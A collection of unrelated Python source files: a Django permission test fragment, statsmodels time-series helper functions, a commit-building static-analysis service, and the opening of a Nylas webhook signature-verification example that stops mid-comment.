self.assertFalse(instance.has_perm(self.user, 'unknown', self.article))
def test_has_perm_permission_logics_called(self):
instance = self.handler(Article)
instance.get_supported_permissions = MagicMock(return_value=[
'permission.add_article',
'permission.change_article',
'permission.delete_article',
])
self.assertFalse(self.mock_logic1.has_perm.called)
self.assertFalse(self.mock_logic2.has_perm.called)
self.assertFalse(instance.has_perm(self.user,
'permission.add_article'))
self.assertTrue(self.mock_logic1.has_perm.called)
self.assertTrue(self.mock_logic2.has_perm.called)
self.assertEqual(self.mock_logic1.has_perm.call_count, 1)
self.assertEqual(self.mock_logic2.has_perm.call_count, 1)
# permission check should be cached thus `has_perm` should not be
# called twice for same user instance
self.assertFalse(instance.has_perm(self.user,
'permission.add_article'))
self.assertEqual(self.mock_logic1.has_perm.call_count, 1)
self.assertEqual(self.mock_logic2.has_perm.call_count, 1)
|
|
from statsmodels.compat.python import range, lrange, lzip, long
import numpy as np
import numpy.lib.recfunctions as nprf
import pandas as pd
from pandas import DataFrame
from pandas.tseries import offsets
from pandas.tseries.frequencies import to_offset
from statsmodels.tools.sm_exceptions import ValueWarning
from statsmodels.tools.data import _is_using_pandas, _is_recarray
def add_trend(x, trend="c", prepend=False, has_constant='skip'):
"""
Adds a trend and/or constant to an array.
Parameters
----------
X : array-like
Original array of data.
trend : str {"c","t","ct","ctt"}
"c" add constant only
"t" add trend only
"ct" add constant and linear trend
"ctt" add constant and linear and quadratic trend.
prepend : bool
If True, prepends the new data to the columns of X.
has_constant : str {'raise', 'add', 'skip'}
Controls what happens when trend is 'c' and a constant already
exists in X. 'raise' will raise an error. 'add' will duplicate a
constant. 'skip' will return the data without change. 'skip' is the
default.
Returns
-------
y : array, recarray or DataFrame
The original data with the additional trend columns. If x is a
recarray or pandas Series or DataFrame, then the trend column names
are 'const', 'trend' and 'trend_squared'.
Notes
-----
Returns columns as ["ctt","ct","c"] whenever applicable. There is currently
no checking for an existing trend.
See also
--------
statsmodels.tools.add_constant
"""
# TODO: could be generalized for trend of aribitrary order
trend = trend.lower()
columns = ['const', 'trend', 'trend_squared']
if trend == "c": # handles structured arrays
columns = columns[:1]
trendorder = 0
elif trend == "ct" or trend == "t":
columns = columns[:2]
if trend == "t":
columns = columns[1:2]
trendorder = 1
elif trend == "ctt":
trendorder = 2
else:
raise ValueError("trend %s not understood" % trend)
is_recarray = _is_recarray(x)
is_pandas = _is_using_pandas(x, None) or is_recarray
if is_pandas or is_recarray:
if is_recarray:
descr = x.dtype.descr
x = pd.DataFrame.from_records(x)
elif isinstance(x, pd.Series):
x = pd.DataFrame(x)
else:
x = x.copy()
else:
x = np.asanyarray(x)
nobs = len(x)
trendarr = np.vander(np.arange(1, nobs + 1, dtype=np.float64), trendorder + 1)
# put in order ctt
trendarr = np.fliplr(trendarr)
if trend == "t":
trendarr = trendarr[:, 1]
if "c" in trend:
if is_pandas or is_recarray:
# Mixed type protection
def safe_is_const(s):
try:
return np.ptp(s) == 0.0 and np.any(s != 0.0)
except:
return False
col_const = x.apply(safe_is_const, 0)
else:
col_const = np.logical_and(np.any(np.ptp(np.asanyarray(x), axis=0) == 0, axis=0),
np.all(x != 0.0, axis=0))
if np.any(col_const):
if has_constant == 'raise':
raise ValueError("x already contains a constant")
elif has_constant == 'skip':
columns = columns[1:]
trendarr = trendarr[:, 1:]
order = 1 if prepend else -1
if is_recarray or is_pandas:
trendarr = pd.DataFrame(trendarr, index=x.index, columns=columns)
x = [trendarr, x]
x = pd.concat(x[::order], 1)
else:
x = [trendarr, x]
x = np.column_stack(x[::order])
if is_recarray:
x = x.to_records(index=False, convert_datetime64=False)
new_descr = x.dtype.descr
extra_col = len(new_descr) - len(descr)
descr = new_descr[:extra_col] + descr if prepend else descr + new_descr[-extra_col:]
x = x.astype(np.dtype(descr))
return x
def add_lag(x, col=None, lags=1, drop=False, insert=True):
"""
Returns an array with lags included given an array.
Parameters
----------
x : array
An array or NumPy ndarray subclass. Can be either a 1d or 2d array with
observations in columns.
col : 'string', int, or None
If data is a structured array or a recarray, `col` can be a string
that is the name of the column containing the variable. Or `col` can
be an int of the zero-based column index. If it's a 1d array `col`
can be None.
lags : int
The number of lags desired.
drop : bool
Whether to keep the contemporaneous variable for the data.
insert : bool or int
If True, inserts the lagged values after `col`. If False, appends
the data. If int inserts the lags at int.
Returns
-------
array : ndarray
Array with lags
Examples
--------
>>> import statsmodels.api as sm
>>> data = sm.datasets.macrodata.load()
>>> data = data.data[['year','quarter','realgdp','cpi']]
>>> data = sm.tsa.add_lag(data, 'realgdp', lags=2)
Notes
-----
Trims the array both forward and backward, so that the array returned
so that the length of the returned array is len(`X`) - lags. The lags are
returned in increasing order, ie., t-1,t-2,...,t-lags
"""
if x.dtype.names:
names = x.dtype.names
if not col and np.squeeze(x).ndim > 1:
raise IndexError("col is None and the input array is not 1d")
elif len(names) == 1:
col = names[0]
if isinstance(col, (int, long)):
col = x.dtype.names[col]
contemp = x[col]
# make names for lags
tmp_names = [col + '_'+'L(%i)' % i for i in range(1,lags+1)]
ndlags = lagmat(contemp, maxlag=lags, trim='Both')
# get index for return
if insert is True:
ins_idx = list(names).index(col) + 1
elif insert is False:
ins_idx = len(names) + 1
else: # insert is an int
if insert > len(names):
import warnings
warnings.warn("insert > number of variables, inserting at the"
" last position", ValueWarning)
ins_idx = insert
first_names = list(names[:ins_idx])
last_names = list(names[ins_idx:])
if drop:
if col in first_names:
first_names.pop(first_names.index(col))
else:
last_names.pop(last_names.index(col))
if first_names: # only do this if x isn't "empty"
first_arr = nprf.append_fields(x[first_names][lags:],tmp_names,
ndlags.T, usemask=False)
else:
first_arr = np.zeros(len(x)-lags, dtype=lzip(tmp_names,
(x[col].dtype,)*lags))
for i,name in enumerate(tmp_names):
first_arr[name] = ndlags[:,i]
if last_names:
return nprf.append_fields(first_arr, last_names,
[x[name][lags:] for name in last_names], usemask=False)
else: # lags for last variable
return first_arr
else: # we have an ndarray
if x.ndim == 1: # make 2d if 1d
x = x[:,None]
if col is None:
col = 0
# handle negative index
if col < 0:
col = x.shape[1] + col
contemp = x[:,col]
if insert is True:
ins_idx = col + 1
elif insert is False:
ins_idx = x.shape[1]
else:
if insert < 0: # handle negative index
insert = x.shape[1] + insert + 1
if insert > x.shape[1]:
insert = x.shape[1]
import warnings
warnings.warn("insert > number of variables, inserting at the"
" last position", ValueWarning)
ins_idx = insert
ndlags = lagmat(contemp, lags, trim='Both')
first_cols = lrange(ins_idx)
last_cols = lrange(ins_idx,x.shape[1])
if drop:
if col in first_cols:
first_cols.pop(first_cols.index(col))
else:
last_cols.pop(last_cols.index(col))
return np.column_stack((x[lags:,first_cols],ndlags,
x[lags:,last_cols]))
def detrend(x, order=1, axis=0):
"""
Detrend an array with a trend of given order along axis 0 or 1
Parameters
----------
x : array_like, 1d or 2d
data, if 2d, then each row or column is independently detrended with the
same trendorder, but independent trend estimates
order : int
specifies the polynomial order of the trend, zero is constant, one is
linear trend, two is quadratic trend
axis : int
axis can be either 0, observations by rows,
or 1, observations by columns
Returns
-------
detrended data series : ndarray
The detrended series is the residual of the linear regression of the
data on the trend of given order.
"""
if x.ndim == 2 and int(axis) == 1:
x = x.T
elif x.ndim > 2:
raise NotImplementedError('x.ndim > 2 is not implemented until it is needed')
nobs = x.shape[0]
if order == 0:
# Special case demean
resid = x - x.mean(axis=0)
else:
trends = np.vander(np.arange(float(nobs)), N=order + 1)
beta = np.linalg.pinv(trends).dot(x)
resid = x - np.dot(trends, beta)
if x.ndim == 2 and int(axis) == 1:
resid = resid.T
return resid
def lagmat(x, maxlag, trim='forward', original='ex', use_pandas=False):
"""
Create 2d array of lags
Parameters
----------
x : array_like, 1d or 2d
data; if 2d, observation in rows and variables in columns
maxlag : int
all lags from zero to maxlag are included
trim : str {'forward', 'backward', 'both', 'none'} or None
* 'forward' : trim invalid observations in front
* 'backward' : trim invalid initial observations
* 'both' : trim invalid observations on both sides
* 'none', None : no trimming of observations
original : str {'ex','sep','in'}
* 'ex' : drops the original array returning only the lagged values.
* 'in' : returns the original array and the lagged values as a single
array.
* 'sep' : returns a tuple (original array, lagged values). The original
array is truncated to have the same number of rows as
the returned lagmat.
use_pandas : bool, optional
If true, returns a DataFrame when the input is a pandas
Series or DataFrame. If false, return numpy ndarrays.
Returns
-------
lagmat : 2d array
array with lagged observations
y : 2d array, optional
Only returned if original == 'sep'
Examples
--------
>>> from statsmodels.tsa.tsatools import lagmat
>>> import numpy as np
>>> X = np.arange(1,7).reshape(-1,2)
>>> lagmat(X, maxlag=2, trim="forward", original='in')
array([[ 1., 2., 0., 0., 0., 0.],
[ 3., 4., 1., 2., 0., 0.],
[ 5., 6., 3., 4., 1., 2.]])
>>> lagmat(X, maxlag=2, trim="backward", original='in')
array([[ 5., 6., 3., 4., 1., 2.],
[ 0., 0., 5., 6., 3., 4.],
[ 0., 0., 0., 0., 5., 6.]])
>>> lagmat(X, maxlag=2, trim="both", original='in')
array([[ 5., 6., 3., 4., 1., 2.]])
>>> lagmat(X, maxlag=2, trim="none", original='in')
array([[ 1., 2., 0., 0., 0., 0.],
[ 3., 4., 1., 2., 0., 0.],
[ 5., 6., 3., 4., 1., 2.],
[ 0., 0., 5., 6., 3., 4.],
[ 0., 0., 0., 0., 5., 6.]])
Notes
-----
When using a pandas DataFrame or Series with use_pandas=True, trim can only
be 'forward' or 'both' since it is not possible to consistently extend index
values.
"""
# TODO: allow list of lags additional to maxlag
is_pandas = _is_using_pandas(x, None) and use_pandas
trim = 'none' if trim is None else trim
trim = trim.lower()
if is_pandas and trim in ('none', 'backward'):
raise ValueError("trim cannot be 'none' or 'forward' when used on "
"Series or DataFrames")
xa = np.asarray(x)
dropidx = 0
if xa.ndim == 1:
xa = xa[:, None]
nobs, nvar = xa.shape
if original in ['ex', 'sep']:
dropidx = nvar
if maxlag >= nobs:
raise ValueError("maxlag should be < nobs")
lm = np.zeros((nobs + maxlag, nvar * (maxlag + 1)))
for k in range(0, int(maxlag + 1)):
lm[maxlag - k:nobs + maxlag - k,
nvar * (maxlag - k):nvar * (maxlag - k + 1)] = xa
if trim in ('none', 'forward'):
startobs = 0
elif trim in ('backward', 'both'):
startobs = maxlag
else:
raise ValueError('trim option not valid')
if trim in ('none', 'backward'):
stopobs = len(lm)
else:
stopobs = nobs
if is_pandas:
x_columns = x.columns if isinstance(x, DataFrame) else [x.name]
columns = [str(col) for col in x_columns]
for lag in range(maxlag):
lag_str = str(lag + 1)
columns.extend([str(col) + '.L.' + lag_str for col in x_columns])
lm = DataFrame(lm[:stopobs], index=x.index, columns=columns)
lags = lm.iloc[startobs:]
if original in ('sep', 'ex'):
leads = lags[x_columns]
lags = lags.drop(x_columns, 1)
else:
lags = lm[startobs:stopobs, dropidx:]
if original == 'sep':
leads = lm[startobs:stopobs, :dropidx]
if original == 'sep':
return lags, leads
else:
return lags
def lagmat2ds(x, maxlag0, maxlagex=None, dropex=0, trim='forward'):
'''generate lagmatrix for 2d array, columns arranged by variables
Parameters
----------
x : array_like, 2d
2d data, observation in rows and variables in columns
maxlag0 : int
for first variable all lags from zero to maxlag are included
maxlagex : None or int
max lag for all other variables all lags from zero to maxlag are included
dropex : int (default is 0)
exclude first dropex lags from other variables
for all variables, except the first, lags from dropex to maxlagex are
included
trim : string
* 'forward' : trim invalid observations in front
* 'backward' : trim invalid initial observations
* 'both' : trim invalid observations on both sides
* 'none' : no trimming of observations
Returns
-------
lagmat : 2d array
array with lagged observations, columns ordered by variable
Notes
-----
very inefficient for unequal lags, just done for convenience
'''
if maxlagex is None:
maxlagex = maxlag0
maxlag = max(maxlag0, maxlagex)
nobs, nvar = x.shape
lagsli = [lagmat(x[:,0], maxlag, trim=trim, original='in')[:,:maxlag0+1]]
for k in range(1,nvar):
lagsli.append(lagmat(x[:,k], maxlag, trim=trim, original='in')[:,dropex:maxlagex+1])
return np.column_stack(lagsli)
def vec(mat):
return mat.ravel('F')
def vech(mat):
# Gets Fortran-order
return mat.T.take(_triu_indices(len(mat)))
# tril/triu/diag, suitable for ndarray.take
def _tril_indices(n):
rows, cols = np.tril_indices(n)
return rows * n + cols
def _triu_indices(n):
rows, cols = np.triu_indices(n)
return rows * n + cols
def _diag_indices(n):
rows, cols = np.diag_indices(n)
return rows * n + cols
def unvec(v):
k = int(np.sqrt(len(v)))
assert(k * k == len(v))
return v.reshape((k, k), order='F')
def unvech(v):
# quadratic formula, correct fp error
rows = .5 * (-1 + np.sqrt(1 + 8 * len(v)))
rows = int(np.round(rows))
result = np.zeros((rows, rows))
result[np.triu_indices(rows)] = v
result = result + result.T
# divide diagonal elements by 2
result[np.diag_indices(rows)] /= 2
return result
def duplication_matrix(n):
"""
Create duplication matrix D_n which satisfies vec(S) = D_n vech(S) for
symmetric matrix S
Returns
-------
D_n : ndarray
"""
tmp = np.eye(n * (n + 1) // 2)
return np.array([unvech(x).ravel() for x in tmp]).T
def elimination_matrix(n):
"""
Create the elimination matrix L_n which satisfies vech(M) = L_n vec(M) for
any matrix M
Parameters
----------
Returns
-------
"""
vech_indices = vec(np.tril(np.ones((n, n))))
return np.eye(n * n)[vech_indices != 0]
def commutation_matrix(p, q):
"""
Create the commutation matrix K_{p,q} satisfying vec(A') = K_{p,q} vec(A)
Parameters
----------
p : int
q : int
Returns
-------
K : ndarray (pq x pq)
"""
K = np.eye(p * q)
indices = np.arange(p * q).reshape((p, q), order='F')
return K.take(indices.ravel(), axis=0)
def _ar_transparams(params):
"""
Transforms params to induce stationarity/invertability.
Parameters
----------
params : array
The AR coefficients
Reference
---------
Jones(1980)
"""
newparams = ((1-np.exp(-params))/
(1+np.exp(-params))).copy()
tmp = ((1-np.exp(-params))/
(1+np.exp(-params))).copy()
for j in range(1,len(params)):
a = newparams[j]
for kiter in range(j):
tmp[kiter] -= a * newparams[j-kiter-1]
newparams[:j] = tmp[:j]
return newparams
def _ar_invtransparams(params):
"""
Inverse of the Jones reparameterization
Parameters
----------
params : array
The transformed AR coefficients
"""
# AR coeffs
tmp = params.copy()
for j in range(len(params)-1,0,-1):
a = params[j]
for kiter in range(j):
tmp[kiter] = (params[kiter] + a * params[j-kiter-1])/\
(1-a**2)
params[:j] = tmp[:j]
invarcoefs = -np.log((1-params)/(1+params))
return invarcoefs
def _ma_transparams(params):
"""
Transforms params to induce stationarity/invertability.
Parameters
----------
params : array
The ma coeffecients of an (AR)MA model.
Reference
---------
Jones(1980)
"""
newparams = ((1-np.exp(-params))/(1+np.exp(-params))).copy()
tmp = ((1-np.exp(-params))/(1+np.exp(-params))).copy()
# levinson-durbin to get macf
for j in range(1,len(params)):
b = newparams[j]
for kiter in range(j):
tmp[kiter] += b * newparams[j-kiter-1]
newparams[:j] = tmp[:j]
return newparams
def _ma_invtransparams(macoefs):
"""
Inverse of the Jones reparameterization
Parameters
----------
params : array
The transformed MA coefficients
"""
tmp = macoefs.copy()
for j in range(len(macoefs)-1,0,-1):
b = macoefs[j]
for kiter in range(j):
tmp[kiter] = (macoefs[kiter]-b *macoefs[j-kiter-1])/(1-b**2)
macoefs[:j] = tmp[:j]
invmacoefs = -np.log((1-macoefs)/(1+macoefs))
return invmacoefs
def unintegrate_levels(x, d):
"""
Returns the successive differences needed to unintegrate the series.
Parameters
----------
x : array-like
The original series
d : int
The number of differences of the differenced series.
Returns
-------
y : array-like
The increasing differences from 0 to d-1 of the first d elements
of x.
See Also
--------
unintegrate
"""
x = x[:d]
return np.asarray([np.diff(x, d - i)[0] for i in range(d, 0, -1)])
def unintegrate(x, levels):
"""
After taking n-differences of a series, return the original series
Parameters
----------
x : array-like
The n-th differenced series
levels : list
A list of the first-value in each differenced series, for
[first-difference, second-difference, ..., n-th difference]
Returns
-------
y : array-like
The original series de-differenced
Examples
--------
>>> x = np.array([1, 3, 9., 19, 8.])
>>> levels = unintegrate_levels(x, 2)
>>> levels
array([ 1., 2.])
>>> unintegrate(np.diff(x, 2), levels)
array([ 1., 3., 9., 19., 8.])
"""
levels = list(levels)[:] # copy
if len(levels) > 1:
x0 = levels.pop(-1)
return unintegrate(np.cumsum(np.r_[x0, x]), levels)
x0 = levels[0]
return np.cumsum(np.r_[x0, x])
def freq_to_period(freq):
"""
Convert a pandas frequency to a periodicity
Parameters
----------
freq : str or offset
Frequency to convert
Returns
-------
period : int
Periodicity of freq
Notes
-----
Annual maps to 1, quarterly maps to 4, monthly to 12, weekly to 52.
"""
if not isinstance(freq, offsets.DateOffset):
freq = to_offset(freq) # go ahead and standardize
freq = freq.rule_code.upper()
if freq == 'A' or freq.startswith(('A-', 'AS-')):
return 1
elif freq == 'Q' or freq.startswith(('Q-', 'QS-')):
return 4
elif freq == 'M' or freq.startswith(('M-', 'MS')):
return 12
elif freq == 'W' or freq.startswith('W-'):
return 52
elif freq == 'D':
return 7
elif freq == 'B':
return 5
elif freq == 'H':
return 24
else: # pragma : no cover
raise ValueError("freq {} not understood. Please report if you "
"think this in error.".format(freq))
__all__ = ['lagmat', 'lagmat2ds','add_trend', 'duplication_matrix',
'elimination_matrix', 'commutation_matrix',
'vec', 'vech', 'unvec', 'unvech']
|
|
"""
The MIT License (MIT)
Copyright (c) 2016-2017 Louis-Philippe Querel [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from psycopg2._psycopg import IntegrityError
from static_analysis_runner.post_build_runner import run
import subprocess
import time
from db_versioning import flyway_runner
from kdm_extractor import extract
from repos.repo_manager import load_repository, clear_all_repositories
from repos.git import GIT
from utility.artifact_archiver import archive, artifact_archiver_version
from utility.commit import commit_params
from utility.jdk_override import JdkOverride
from utility.mvn_override import MvnOverride
from utility.service_sql import *
import config
from config import *
from warning_recovery.file_change_history import get_commit_file_history
from warning_recovery.warning_tracing import commit_warning_recovery
"""
The purpose of this script is to automatically run the TOIF adaptors on each commit that commitguru as analysed.
"""
PROJECT_NAME = "WarningsGuru"
VERSION = "0.1.2"
BUILD_SUCCESS = "BUILD"
BUILD_FAILED = "FAILURE"
class WarningsGuruService:
def __init__(self):
logger.info("Starting %s - version %s" % (PROJECT_NAME, VERSION))
# TODO check dependencies for all modules (toif, git, commitguru, maven, etc.)
db = config.get_local_settings()
# Checking the state of database and attempting to migrate if necessary
flyway_runner.migrate_db(db[DATABASE_HOST], db[DATABASE_PORT], db[DATABASE_NAME], db[DATABASE_USERNAME], db[DATABASE_PASSWORD])
# Load overrides
self._jdk_override_loader()
self._maven_override_loader()
# Once everything as been validated we can start the service
logger.info("Service prerequisites check complete. Starting %s" % PROJECT_NAME)
self._start_service()
def _jdk_override_loader(self):
self.jdk_override = self.__generic_override_loader("JDK", JdkOverride)
def _maven_override_loader(self):
self.mvn_override = self.__generic_override_loader("MVN", MvnOverride)
def __generic_override_loader(self, conf_variable, override_class):
if "OVERRIDES" in dir(config) and isinstance(config.OVERRIDES, dict):
if conf_variable in OVERRIDES and isinstance(OVERRIDES[conf_variable], list):
override = override_class(OVERRIDES[conf_variable])
logger.info("Loaded the following %s overrides %s" % (override.name, str(override.overrides)))
return override
else:
logger.warn("%s is missing from OVERRIDES in config file" % conf_variable)
return override_class([])
else:
logger.warn("OVERRIDES is missing from config file")
return override_class([])
def _start_service(self):
service_db = Service_DB(REPROCESS_FAILURES_HOURS)
while True:
# clear repos
clear_all_repositories(REPOSITORY_CACHE_PATH)
service_db.truncate_commit_processing()
commits = service_db.get_unprocessed_commits()
if len(commits) > 0:
# Checkout repo to commit
for commit in commits:
repo_id, commit_hash, repo_path = commit_params(commit)
author_date = commit['author_date'].date()
try:
self._process_commit(service_db, repo_id, commit_hash, repo_path, author_date)
except IntegrityError as error:
logger.error("%s: Database error: %s" % (commit_hash, error.message))
service_db.processing_commit_sql_failed(repo_id, commit_hash, error.message)
# Once all the commits in the batch have been ran we need to obtain the warnings recovery
for commit in commits:
repo_id, commit_hash, repo_path = commit_params(commit)
commit_warning_recovery(service_db.db, repo_id, commit_hash, repo_path)
else:
logger.info("No new tasks to run. Going to sleep for %s minutes" % BACKGROUND_SLEEP_MINUTES)
time.sleep(BACKGROUND_SLEEP_MINUTES*60)
def _process_commit(self, service_db, repo_id, commit_hash, repo_path, author_date):
# Update db to reflect that we are processing the commit
service_db.processing_commit(repo_id, commit_hash)
# Clear out any previous runs of the commit
service_db.clear_commit_data(repo_id, commit_hash)
# load the repository if it does not exist or if it is not up to date with the commit to analyse
if not load_repository(repo_id, repo_path, commit_hash):
# Failed to load the repo or the commit
commit_result = "COMMIT_MISSING"
log = "repo or commit not loaded"
else:
commit_result, log = self.checkout_and_build_commit(commit_hash, repo_path, author_date)
# We run static analysis even if the build as failed as a project is usually composed of sub
# projects and we might be able to recover some of the warnings
if commit_result in [BUILD_SUCCESS, BUILD_FAILED]:
# Run static analysis on the generated, modified class files
logger.info("%s: Running static analysis" % commit_hash)
class_file_mapping = _run_static_analysis(repo_path, commit_hash)
if len(class_file_mapping) > 0:
logger.info("%s: Running TOIF file warnings assimilator" % commit_hash)
# Build was successful so we can continue
log = "\n".join((log, run_assimilator(repo_path)))
logger.info("%s: Attempting to extract file warnings from assimilator" % commit_hash)
_manage_assimilator_result(repo_id, commit_hash, repo_path, service_db, class_file_mapping)
else:
logger.info("%s: No TOIF file warnings to assimilate" % commit_hash)
if ARTIFACT_ARCHIVER:
if ARTIFACT_ARCHIVER_PATH:
logger.info("%s: Running archiving on build artifacts as enabled" % commit_hash)
archiving_result = archive(repo_path, ARTIFACT_ARCHIVER_PATH, repo_id, commit_hash)
if archiving_result:
service_db.commit_log_tool(repo_id, commit_hash, 'artifacts_archived', artifact_archiver_version)
logger.info("%s: Finished archiving of build artifacts" % commit_hash)
else:
logger.warn("Build artifact archiving cannot be enabled if the archiving path is not specified")
# Get the commit parent history
logger.info("%s: Saving the commit parents" % commit_hash)
parent_commit_history = _get_commit_parents(repo_path, repo_id)
service_db.add_commit_history_graph(parent_commit_history)
# Getting the file history and adding it to the db
logger.info("%s: Obtaining file history" % commit_hash)
get_commit_file_history(service_db.db, repo_id, repo_path, commit_hash)
service_db.processed_commit(repo_id, commit_hash, commit_result, log=log)
def checkout_and_build_commit(self, commit_hash, repo_dir, author_date):
GIT().checkout(repo_dir, commit_hash)
# Check if it's a maven project
pom_file_path = os.path.join(repo_dir, "pom.xml")
pom_exists = os.path.exists(pom_file_path)
if not pom_exists:
logger.info("%s: Missing POM - Nothing to build" % commit_hash)
return "MISSING POM", ""
# Determine if we need to override the jdk
jdk_value = self.jdk_override.get_override(commit_hash, author_date)
mvn_value = self.mvn_override.get_override(commit_hash, author_date)
logger.info("%s: Building commit using MAVEN" % commit_hash)
# run the commit build
# "-Dmaven.test.skip.exec=true" disables testing on older version of Maven < surefire 2.3
mvn_command = "{jdk} MAVEN_OPTS=\"{maven_options}\" {mvn} clean package -DskipTests -Dmaven.test.skip.exec=true" \
.format(jdk=jdk_value, maven_options=MAVEN_OPTS, mvn=mvn_value)
logger.debug("%s: Maven command '%s'" % (commit_hash, mvn_command))
mvn_process = subprocess.Popen(mvn_command, shell=True, cwd=repo_dir, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
maven_logs = mvn_process.communicate()[0]
if mvn_process.returncode == 0:
logger.info("%s: Build Success" % commit_hash)
return BUILD_SUCCESS, maven_logs
else:
logger.warning("%s: Build Failed" % commit_hash)
return BUILD_FAILED, maven_logs
def _get_adaptor_output_dir_path(repo_dir):
return os.path.join(repo_dir, ADAPTOR_OUTPUT_DIR)
def _get_kdm_file_output_path(repo_dir):
# TODO make this configurable
return os.path.abspath(os.path.join(repo_dir, KDM_FILE))
def _run_static_analysis(repo_dir, commit):
adaptor_dir_path = _get_adaptor_output_dir_path(repo_dir)
# Create directory where to save toif adaptor files
if not os.path.exists(adaptor_dir_path):
os.makedirs(adaptor_dir_path)
return run(repo_dir, adaptor_dir_path, commit)
def _manage_assimilator_result(repo_id, commit_hash, repo_dir, service_db, class_file_mapping):
kdm_file = _get_kdm_file_output_path(repo_dir)
zip_kdm_file = kdm_file + ".zip"
# Determine if assimilator generated kdm file
if os.path.isfile(zip_kdm_file):
_extract_kdm_file(repo_dir)
if os.path.isfile(kdm_file):
# Process extracted kdm file
logger.info("%s: Extracting warnings" % commit_hash)
warnings = extract.etl_warnings(kdm_file, repo_dir, repo_id, commit_hash, class_file_mapping)
logger.info("%s: %s warnings identified" % (commit_hash, len(warnings)))
# Save warnings to db
service_db.add_commit_warning_lines(warnings)
# Get the line blames
logger.info("%s: Obtaining history of warnings", commit_hash)
line_blames = _get_line_blames(repo_dir, warnings)
for blame in line_blames:
blame["repo_id"] = repo_id
blame['commit_id'] = commit_hash
service_db.add_commit_warning_blames(line_blames)
else:
logger.error("%s: file %s does not exist. this is not normal as zip file existed" % (commit_hash, kdm_file))
else:
logger.info("%s: file %s does not exist. No file might have been analysed by static analysis tools" %
(commit_hash, zip_kdm_file))
def run_assimilator(repo_dir):
adaptor_output_path = os.path.abspath(_get_adaptor_output_dir_path(repo_dir))
assimilator_output_file_path = _get_kdm_file_output_path(repo_dir)
assimilator_process = subprocess.Popen("%s --merge --kdmfile=%s --inputfile=%s" %
(TOIF_EXECUTABLE, assimilator_output_file_path, adaptor_output_path),
shell=True, cwd=os.path.abspath(repo_dir), stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# return the assimilator log results
result = assimilator_process.communicate()[0]
return result
def _extract_kdm_file(repo_dir):
assimilator_output_file_path = _get_kdm_file_output_path(repo_dir)
# TODO remove when toif is fixed and does not create two copies of the file: {name} and {name}.zip. File {name} is empty
process = subprocess.Popen("rm %s; unzip %s" % (assimilator_output_file_path, assimilator_output_file_path + ".zip"),
shell=True, cwd=os.path.abspath(repo_dir), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
process.communicate()[0]
def _get_commit_parents(repo_dir, repo_id, all_commits=False):
history = GIT().get_commit_parents(repo_dir, all_commits=all_commits)
commit_parents = []
for commit in history:
for parent in commit['parents']:
commit_parents.append({"repo_id": repo_id, "commit_id": commit["commit"], "parent_commit": parent})
return commit_parents
def _get_line_blames(repo_dir, warnings):
files_with_warnings = {}
for warning in warnings:
file_path = warning['resource']
line_number = warning['line_number']
if file_path not in files_with_warnings:
files_with_warnings[file_path] = []
if line_number not in files_with_warnings[file_path]:
files_with_warnings[file_path].append(line_number)
warning_lines_blames = []
for file_path in files_with_warnings.keys():
blames = GIT().get_warning_blames(repo_dir, file_path, files_with_warnings[file_path])
warning_lines_blames.extend(blames)
return warning_lines_blames
WarningsGuruService()
|
|
#!/usr/bin/env python
# Imports from the Python standard library
from __future__ import print_function
import os
import sys
import datetime
import textwrap
import hmac
import hashlib
# Imports from third-party modules that this project depends on
try:
import requests
from flask import Flask, request, render_template
from werkzeug.middleware.proxy_fix import ProxyFix
from celery import Celery
except ImportError:
message = textwrap.dedent(
"""
You need to install the dependencies for this project.
To do so, run this command:
pip install -r requirements.txt
"""
)
print(message, file=sys.stderr)
sys.exit(1)
# This example uses Flask, a micro web framework written in Python.
# For more information, check out the documentation: http://flask.pocoo.org
# Create a Flask app, and load the configuration file.
app = Flask(__name__)
app.config.from_json("config.json")
# Check for dummy configuration values.
# If you are building your own application based on this example,
# you can remove this check from your code.
cfg_needs_replacing = [
key
for key, value in app.config.items()
if isinstance(value, str) and value.startswith("replace me")
]
if cfg_needs_replacing:
message = textwrap.dedent(
"""
This example will only work if you replace the fake configuration
values in `config.json` with real configuration values.
The following config values need to be replaced:
{keys}
Consult the README.md file in this directory for more information.
"""
).format(keys=", ".join(cfg_needs_replacing))
print(message, file=sys.stderr)
sys.exit(1)
# Teach Flask how to find out that it's behind an ngrok proxy
app.wsgi_app = ProxyFix(app.wsgi_app)
# This example also uses Celery, a task queue framework written in Python.
# For more information, check out the documentation: http://docs.celeryproject.org
# Create a Celery instance, and load its configuration from Flask.
celery = Celery(app.import_name)
celery.config_from_object(app.config, namespace="CELERY")
@app.route("/webhook", methods=["GET", "POST"])
def webhook():
"""
When the Flask server gets a request at the `/webhook` URL, it will run
this function. Most of the time, that request will be a genuine webhook
notification from Nylas. However, it's possible that the request could
be a fake notification from someone else, trying to fool our app. This
function needs to verify that the webhook is genuine!
"""
# When you first tell Nylas about your webhook, it will test that webhook
# URL with a GET request to make sure that it responds correctly.
# We just need to return the `challenge` parameter to indicate that this
# is a valid webhook URL.
if request.method == "GET" and "challenge" in request.args:
print(" * Nylas connected to the webhook!")
return request.args["challenge"]
# Alright, this is a POST request, which means it's a webhook notification.
# The question is, is it genuine or fake? Check the signature to find out.
is_genuine = verify_signature(
message=request.data,
key=app.config["NYLAS_OAUTH_CLIENT_SECRET"].encode("utf8"),
signature=request.headers.get("X-Nylas-Signature"),
)
if not is_genuine:
return "Signature verification failed!", 401
# Alright, we have a genuine webhook notification from Nylas!
# Let's find out what it says...
data = request.get_json()
for delta in data["deltas"]:
# Processing the data might take awhile, or it might fail.
# As a result, instead of processing it right now, we'll push a task
